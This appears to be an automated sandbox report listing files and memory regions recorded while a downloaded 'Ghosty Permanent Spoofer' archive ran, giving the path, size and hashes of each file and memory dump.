C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
b5b461d6c6589cab7d235b572bdf29ef

SHA1
b4f609c459d8b42e40daf786f5555fd95a33f7ee

SHA256
f9ec1449cef60d8275f8a94e1c63e3c76341796a8b03824830d54404ee3e5280

SHA512
e83d7d33700061551b6e1b26e4693617ffce902fad686abc37581a2491cb197c1d10624aa7bca0cadf589f46a71409e0ebca61b0d43b65ea57a256d7f3d32017

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
58KB

MD5
d8b7c8b4980dd236f0a245043ca66590

SHA1
34f2660025093a6385223c399223918f8d59b564

SHA256
eec75971f4bf9868f8897168add7c77a609b620d56ec1bfcd228afd24eedea4a

SHA512
9fb44ce2ff03a9e2dad8158b49394b0ebc1aefa271654c8313e153b73482ebc0167f6ac255afa6bd4203584e7e80f22fdf51d7da73ed5492a5891cbec0dc903f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
5a1d187cbba0b0b8b8cdf5efb60ea46c

SHA1
593589f1b21445192a8732a59ed5d7b432cf33a3

SHA256
8e4e9d285e4cf13dee6ed3eae7fe4f21ba9b02c3a3ebfd930d3c341dbaf7dbf6

SHA512
717844986158efb09263f0894ebfef93e3bf9f61e4715aec42d9e75012f715557ae63ca7622d74c264d7fc1a48903391539645d3e8e639cb3eb09b924a4f3adf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
24KB

MD5
a4db4e7be4eec45476556b05e3587338

SHA1
61b8b7cc6124011639ed34ce5005f5190fff7950

SHA256
625e04d493f408ceb8e34511fe1eb78951520d7fc90cd205a9366099e8776798

SHA512
e36a267cc880d6480197f617ecd7302e69b67e73b3cb7d70f0e4ba187f5e902f3e2d98256075184ee92159cc2e1a869766412861872b58c7b9f69e22e3eb0605

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
37KB

MD5
3573511fb882d497924a3f9004ec6c2f

SHA1
4bf20f93c8c0d1c4cb3d886fa36c93c6e4812604

SHA256
4800fb3eb03d64482f38dff7879aa1acd3e6f2c8a65c7d27bb5a477b4fb4ffb9

SHA512
ce82ce8b94c4117ac332434415e218954bfb61ce6f7f0991f4c9793f3c69679af2a0c8ba7ba3fbfdd0592218f1fab0eced6aadc1a0a998a5d0bde314fe1893a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
5badba29d84c4d9b2f7d3b5a329fa9c7

SHA1
958639c7b3f45a6c07a96f88e1f8f396e33a3c82

SHA256
24008cee02921adbe134d02e9960985ce3f6be82daa62206106ecbf84cff6639

SHA512
eae4ea93281a7de0aa053377ed64b3b3e160266dc3da94d351d3e0822f9edecbcfd4299d0b1f75437b6ec50e25ef9fbaeb7c7e1be7110d486b139a4d3079af8e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
14d4c4c51e6942567fc440050917d9ad

SHA1
5fb8e8684e57900aa600a25c5f588207bfe7c4eb

SHA256
5e3f015811d62d0d4c3e4db7f59cf24c256cfdff4d5d20b8b549d50ae71a6fb6

SHA512
1f01aaa7c5021924d53ea479087bd127e5a99e1d157f8b7eb78cfd0e7298cd3a4b966a2882d4b14892c18e9d21fc4487eb2b94dafb78892459e007857693087f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\5b6aa8ae-2577-4190-af3a-019ae30c58d3

Filesize
982B

MD5
65074be749b0d51df7ea8cbaaff0f948

SHA1
1ae75b691d958b357b4f4730aac047c06cd04707

SHA256
6a10b4168a1eaf24fe692cb51bbb830561400920a30018b3696b19987a38f0d8

SHA512
ae79eb9f3893febfdef2a18befd9e7001aa2f5dcc904fad8d899be1610c795aec30e15ec533f013d2721e2abce5a0c3a8e4a6acf19805103835f848722ecad39

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\a34ab117-bdbd-4021-bc21-ef872400f728

Filesize
25KB

MD5
d3546c659bdc45f4958503d9d0e90907

SHA1
18dca2fe3254a38af00a047e882a2b3681592856

SHA256
cbf9db51c54e020120a56c688afea32a6509d2475105171ab1629d73e44fbc38

SHA512
5a7a40e16df5cc9cb5c0cf7e4cdd59899d1813f5a6961cd998c967e96c3e7baeca36232a4f3db2142f6d87df2d5299372f79e70b0b2ae5ceb9031e9406d1b940

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\f78c39ac-f480-49c9-9913-00b5c0f975e5

Filesize
671B

MD5
f27a66ef22859656c6def2f8bcdb6b13

SHA1
7838be6019e29f41b4f83f5c1517f672ab3b2186

SHA256
434b0c0a792f73d019451825c483d6bbf8f4d5ab99f8089f46831b45f0b31363

SHA512
b3371e6764883c4ae761947378a5079509941373e47798721f862a5bb25c97e53559bdc25bd3895ee6d0d143bade8ce5c524d0b0e78135e1eddc3252e3958aa0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs-1.js

Filesize
14KB

MD5
8b64fdd782fbda54bc14e448536a8895

SHA1
5a2b4db7e30662c1c7f0a807d666e75480c32c80

SHA256
c123c192a0db1595bbcdc9299e25af79e04d694cd1a94b19d8f4718e3814b60a

SHA512
7f29551fdbea47518883b3f0bd6f1db345dd54890a6a0a9273ce9f11b104d6703d772f46c7925ced19c1fb504087d6f6e970a46771b6cdceb93d7b1b71c05dd9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs-1.js

Filesize
11KB

MD5
bd2a5936e3938aee2725bcdf45ecc8b7

SHA1
d5c9bded80f5aa57e990bbe8159166d9da7f17af

SHA256
ee00e20864234ed0c0be48f9946b3a161368b374d2712720e40b64605b4f6306

SHA512
126c8f29de04f886db11239cb52dcc653791e76417965932b85a039ca00c4fc0cc1ffdc9f59a5b5c2166be58817146b524aac386b5ae513dc3ae10a2e1e7fbbf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs-1.js

Filesize
10KB

MD5
bc8b7514a503f048c24474652110e5f5

SHA1
28804a62648a60a2a9170062eacdc16698e3bb25

SHA256
f9eedf53b694e2b485dbd81af62d0bfdf3d5e5bda8b55c31f56d7be9903ea3bb

SHA512
b34dc93ab2f080a3ede09cb80a4a9e7e85e140382aaceeafc03064c147ebae569b10d6d762d4d4f931d20277d5524cc0d5e04412bb1e84151e9671b026ce87ae

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs-1.js

Filesize
11KB

MD5
54bbbd5c9d3911e6ce748a6dc074d854

SHA1
f531b9aaa03382570569be92b84f289080a3f4c9

SHA256
fa2ee9eb5e596e86e5d4eb48f428487a66f917bc815d8b540d48e9d292187386

SHA512
df1e29a980cc86e9aa08c23eb38d1551ad6bea51dc3b39a4cd9043350cc584d12457a7d20e15e3ac577b0491219d5a08bf4edfeb4211fe63d3bfeb95aa7fbf33

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs-1.js

Filesize
9KB

MD5
b66217961400abedd7cb6a08cec09ad5

SHA1
381e6dc60ecd7f75551edbb36415349f0fbdd153

SHA256
5b123e40e3f16279b3ed730cdd94456c63c29ef15506a08662b515373e8b3edd

SHA512
dce3b93cd65403b54abec9597456d91231e178ee9fa4036008d06198698ffe74c67984a23eef1e6d927a9e9558f66e6f9e760a20f064d6506c69014163ddf854

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs.js

Filesize
9KB

MD5
c294a9b2eba6998f6629169fd28d3afb

SHA1
cb74122d25893cf2d0d6e1b15c49f361ce4a831d

SHA256
9472a2461c9269d7b1b9f1d8a1d7bc5993ea7ad9a3ce2c027ca106a849285cc9

SHA512
ab7816f159f03597c89955f4a0bf18fe802bf046663917e8aeaf14f3aa067cee97aa54c9b71bd946bedf9d157b08a0e39031a30ba705b6ac2067cd8cac7320dd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\prefs.js

Filesize
10KB

MD5
85b27a92c23a13617b74aae8b60549d5

SHA1
0ad4b6588ee2671f23c78d389d6ed5baa527f524

SHA256
e2b71e4c1b5bb7fb9bbb0712d9b3a6895574e51b1cc63389dfbb5a32d90ab299

SHA512
9f0d50b6f08571cddc3391953a72172070c1c391953f4e4faa28fb1aca431faff1aeebf14bc02b88f9e69bb62a7ed3a6c91b16d408eb2852157e0aa5aa45a8f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
7f70e9b9fe92261454af7d81cb545964

SHA1
4d8d4d38ea59684a75e6d553bee947dda7ee7135

SHA256
2b1074a906af684873af64e7e33c5dcf6e85f46bb4e0abc85deee1b3f3ab75d7

SHA512
0ad71eed591a7a4c931e7b59927535a8be7acd575d339e2f0004df8185aa6972e50bc4e5a6ce162a4ac6553da31c958f40a160ef9c68b6e38c535d6ba1fb5520

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
903e376321851194a29d2f95605b3e36

SHA1
16920f96622351d9467da80b69b0419c2114b659

SHA256
a9fffed6fb504c4d6b823db6eaea6e5ff0af2d800e322262dd7dbe38ba475a52

SHA512
9ee198b3b99ecaca6a64e2778cca5456f4961d06e34eb7c9ecea76bde08d1372582dcf08782c5acb7b95bb69fee1d8a24816d162883634e0aca162176d575b96

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
cc4c9a12101371d0066037eba5572fe0

SHA1
7bf11621f9a84b842e0f3f478893ccc453111341

SHA256
7618df967ee8aa32374862afc65bd2d74c7ef62110383667ebb80bd58a8eee2c

SHA512
c0ce2ebda67bd0a2b04d4ef7f028ed136f134fee8a10321b72929cc810fdb1a7ae5b99e111f096686c327c976e39ae2db453fe61afba63bb98540a2bbb438458

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
8e6acc1aeedaacea13b4dcaadf8679de

SHA1
a27836514902b51e84975852602760d0ffec8edb

SHA256
21274aba9537d0efd22137f7f3ce8afb68d17f2de9fa6aba71531288105efc7f

SHA512
41ee212991c712adf739ce07f32a31a2ade013e6d8df354c80ea92bc31b4e554adfeb165909d9af58b6e821220529a61fb665cea9543baf9aa4dbb740a40e60b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
c59432a279e4cb43c8b84f0664f908eb

SHA1
30403fe50dfc3bf46920ef18d70e5ae4d4a6ea3e

SHA256
9c8812097808bdd354c598bec09d1c55c90cb5530016440404115600618895f8

SHA512
ed177901acfc6e2d39ae06d54999bb4b8a0fc1e8007ce452a39fe685f49270b8b81c06a8a937d8fd728cb1b1f58df4b6578ea4dec6f6723b04e12d85da11560a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
5.6MB

MD5
4aa4eec31e624db1ea98463a929efa80

SHA1
4749fb1ef3c7c7345d8e8b837ff8416b07d29d5e

SHA256
90099aedad451eaf6c008001f85085964cc69725c428aabef659216e8d203b0f

SHA512
2ca58ab0cb4ccb8ce1a584b0a86c308f1b0b0e14f9a99e7443651be38a5a974cb1529c493110cc8c1ada42171b37ba01f9ba4738cca50a057de1004bd03dd757

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
5.6MB

MD5
b06cea7f936ca508a33aff885ee16abc

SHA1
96683e73295929c516dee2fc2a431cd6d9653584

SHA256
eda0661c9fab0897d460709c54a50b575de8f236c92e6734c3470c4298f13c4c

SHA512
447083248aaa6a64f8eddd88d5330b364538c5dd2eea6cbaf550556b564a5e5a3cf45a7840bd5901609d30baeeb416e54e0cbd2af278cf18319e82b66725cc95

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
9.3MB

MD5
593566fa95ec47bb136c1e8509361eba

SHA1
ac9cf432271806d0a23f84e4d0a9d824e6e06689

SHA256
142e82b8864aaaef8800f20df7c209f9410d7a91464e55af7aaa515e6d387b1e

SHA512
57d5b8e8b8939a10697f60e88d19cce33c05a78b13fae62aac66e243e6914c75b6d2f940e47e000ff60f2642d91f1ec40f4fa180e8293b052f2024f9823dcfe5

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.S6oniWln.rar.part

Filesize
33.5MB

MD5
44a687ff5f4954f86d0a911cec843437

SHA1
c0379b53e62c3aa490435ebec901442cf637d0e7

SHA256
873b3f4e9bcdf5c69e3928012df2b4d5fb94cb964f89ba842bdeb575178e031b

SHA512
9b352b9ba5c0daec9dde3d73d1c13188e19af6590b15f66fcde0337dd1e7a4b8f14913239b1706c057cd0aad91c7b67c8396fb7d28012fb28b13e21585a703a8

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe

Filesize
6.1MB

MD5
73c7cc676ab19d426f2745ef261d6349

SHA1
f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d

SHA256
4a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0

SHA512
40f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\SafeGuard-Library.dll

Filesize
12.5MB

MD5
0ba40688b6a23948b2bd929dd2777a59

SHA1
bc109471bb84c7dc05ee6b1b63eae36c0e6ab209

SHA256
4e3eca4adbe0c4fede28228239dd93bb866ecd0415569ede6464d796e8d1a3a8

SHA512
104b2e48779d9e1f534ceb546f911e535eda1b2645f494313df661aceca41c134d3a10b3e97a00ddf4a40556421369fff3872e466357743bc21ea19e0b0c2156

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\VMProtectSDK64.dll

Filesize
116KB

MD5
ba5cf8079fa68d90a2e6497d3c5711c1

SHA1
66b3c641ccd9a04ebf35ea868548bf58de295a11

SHA256
ae22254e2b5c5557f35a170696d53e847018221dcd4cc70c153c36ecdd891f81

SHA512
8537604678bed001aca037d94c80d8d1dd3da3d5bf806fa687f44a093cb07a316dcef084b572b4fd9b3cd2d93fedc7db66a817b27f395a772f3b844509c30156

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\brotlicommon.dll

Filesize
134KB

MD5
f2e401ec1c85ba69b28cca6e814afe3c

SHA1
9d7d78e98fae9c22a2ff4a938672c3fe37589738

SHA256
b9b868f703ccb61ec15d14dcc738c4a4eebcc59c2f827090e7ced2f91c9debd7

SHA512
605f0fa4d301519b07bb542ec215e9fa1d7426129c1b8a8de56e5418c3e64867d1f54ece273ff070b8ca4c5bf39dbdebbdddd83d6be6e701bb160b95b4597be1

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\brotlidec.dll

Filesize
49KB

MD5
b388b7f74802614467a17854b4bf75ff

SHA1
0ec7a95503e27ee4735e0c4a7051125ece957ab1

SHA256
da4996a4d6b9e18c3ebce85b5fbd5666950e69e5d0e31afa2eef550c2671bd93

SHA512
7c45a583cacf798b36fc6241397536ecb2eb9a846531fa8906c5c93e0680151ab9cf448bfb5a229c38fac8d4b83cdb044f05b95bada5a047e4acbcbc64c4d0d8

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\bz2.dll

Filesize
74KB

MD5
d31259e39bc2690a34448601e0bf105f

SHA1
e5339404e51f56cc0349b250adb7e61dd4b22476

SHA256
c94f3302b33c45a35ba83448c111dd0138a49d6355c943af0ea40bc8014a991b

SHA512
79261bf57bc098d9c0e5f3cfa6acc2c353bc830fc7ae7201e13f3de54e4e584e5b1b5dfb4193818863cd36759b9c07d431b09f6ac74f6765827c4a2d47115541

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\freetype.dll

Filesize
675KB

MD5
5eb3264c300a0a0a45f22305cff49596

SHA1
06ef49a2d145dc98dbd5eea42b1de53b7039b5c4

SHA256
9aa4d1356beedaad8f8879b49b76d1ff120dec210a1c0135ede8b9337ad0505d

SHA512
a2735a950d3505a7c835e78ed245cbdbff3821d5c9c4ac24b933ee143eab9b95d55ab6cff3bba16229f372077d7cfe2aac9785149ab70e742ed177872cde6ba0

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\libpng16.dll

Filesize
197KB

MD5
ee63a5f831a47c40b38534b078742e53

SHA1
e8320fd97b77e717255ad3732d2c677de77405bd

SHA256
28f086ae4965dd262e000783a4fd8aebdce8eeeef8285db59984144e7a4c45d4

SHA512
7b051a6957723bf1413e6ccb29c688d10eb7f87553cdf5bc8d876ed3f3b6cd5e9bcbeabb151acb36e483587aafaf5ce43d80e2995153b3bcfc14ac9ef3e38726

Download Submit
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\zlib1.dll

Filesize
88KB

MD5
14fdb628e0b51f26a7bc3f59ec6e33f2

SHA1
05deb1793e0a51fd79de99b6738a93cc959522fd

SHA256
0fba4f6adcecbf2082ce52ebd6e7f07f7959b02ae401828aa640154933de40fe

SHA512
28fd35174a70636c367c85116a268dc178546d6f6e632b82b7bd164877555057d31eeec76e1be91e82ce02ce04b6a33f704022d2b31a7066d4b6cb70cd798d90

Download Submit
memory/8-2391-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2392-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2386-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2395-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2394-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2385-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2393-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2397-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2396-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/8-2387-0x000001C0ECEE0000-0x000001C0ECEE1000-memory.dmp

Filesize
4KB

Download
memory/1104-1373-0x0000000000F80000-0x0000000000F8A000-memory.dmp

Filesize
40KB

Download
memory/1104-1389-0x0000000005480000-0x0000000005538000-memory.dmp

Filesize
736KB

Download
memory/1104-1370-0x00000000004B0000-0x00000000005E2000-memory.dmp

Filesize
1.2MB

Download
memory/1104-1392-0x0000000005B00000-0x0000000005B4E000-memory.dmp

Filesize
312KB

Download
memory/1104-1374-0x0000000005550000-0x0000000005AF6000-memory.dmp

Filesize
5.6MB

Download
memory/1104-1387-0x0000000005340000-0x000000000538C000-memory.dmp

Filesize
304KB

Download
memory/1104-1383-0x00000000053D0000-0x0000000005462000-memory.dmp

Filesize
584KB

Download
memory/1612-2922-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2933-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2924-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2929-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2934-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2930-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2932-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2923-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/1612-2931-0x0000014E16AC0000-0x0000014E16AC1000-memory.dmp

Filesize
4KB

Download
memory/2028-1599-0x0000000006780000-0x00000000067CC000-memory.dmp

Filesize
304KB

Download
memory/2028-1620-0x0000000007CA0000-0x0000000007CB1000-memory.dmp

Filesize
68KB

Download
memory/2028-1621-0x0000000007CE0000-0x0000000007CF5000-memory.dmp

Filesize
84KB

Download
memory/2028-1609-0x0000000007930000-0x00000000079D4000-memory.dmp

Filesize
656KB

Download
memory/2028-1600-0x0000000073BA0000-0x0000000073BEC000-memory.dmp

Filesize
304KB

Download
memory/2028-1594-0x0000000006250000-0x00000000065A7000-memory.dmp

Filesize
3.3MB

Download
memory/4724-1434-0x0000000007130000-0x000000000713E000-memory.dmp

Filesize
56KB

Download
memory/4724-1429-0x0000000007530000-0x0000000007BAA000-memory.dmp

Filesize
6.5MB

Download
memory/4724-1388-0x00000000056B0000-0x0000000005A07000-memory.dmp

Filesize
3.3MB

Download
memory/4724-1394-0x0000000005BD0000-0x0000000005C1C000-memory.dmp

Filesize
304KB

Download
memory/4724-1437-0x0000000007220000-0x0000000007228000-memory.dmp

Filesize
32KB

Download
memory/4724-1436-0x0000000007230000-0x000000000724A000-memory.dmp

Filesize
104KB

Download
memory/4724-1435-0x0000000007140000-0x0000000007155000-memory.dmp

Filesize
84KB

Download
memory/4724-1393-0x0000000005B90000-0x0000000005BAE000-memory.dmp

Filesize
120KB

Download
memory/4724-1433-0x00000000070F0000-0x0000000007101000-memory.dmp

Filesize
68KB

Download
memory/4724-1432-0x0000000007170000-0x0000000007206000-memory.dmp

Filesize
600KB

Download
memory/4724-1377-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/4724-1375-0x0000000004CF0000-0x0000000004D12000-memory.dmp

Filesize
136KB

Download
memory/4724-1431-0x0000000006F70000-0x0000000006F7A000-memory.dmp

Filesize
40KB

Download
memory/4724-1376-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/4724-1430-0x0000000006EE0000-0x0000000006EFA000-memory.dmp

Filesize
104KB

Download
memory/4724-1372-0x0000000004EF0000-0x000000000551A000-memory.dmp

Filesize
6.2MB

Download
memory/4724-1371-0x0000000002720000-0x0000000002756000-memory.dmp

Filesize
216KB

Download
memory/4724-1417-0x0000000006190000-0x00000000061C4000-memory.dmp

Filesize
208KB

Download
memory/4724-1428-0x0000000006DB0000-0x0000000006E54000-memory.dmp

Filesize
656KB

Download
memory/4724-1427-0x0000000006D80000-0x0000000006D9E000-memory.dmp

Filesize
120KB

Download
memory/4724-1418-0x0000000070610000-0x000000007065C000-memory.dmp

Filesize
304KB

Download
memory/4904-1416-0x0000000006580000-0x000000000658A000-memory.dmp

Filesize
40KB

Download
memory/4904-1407-0x0000000005D00000-0x0000000005D10000-memory.dmp

Filesize
64KB

Download
memory/4904-1458-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/4904-1406-0x0000000005DD0000-0x0000000005F92000-memory.dmp

Filesize
1.8MB

Download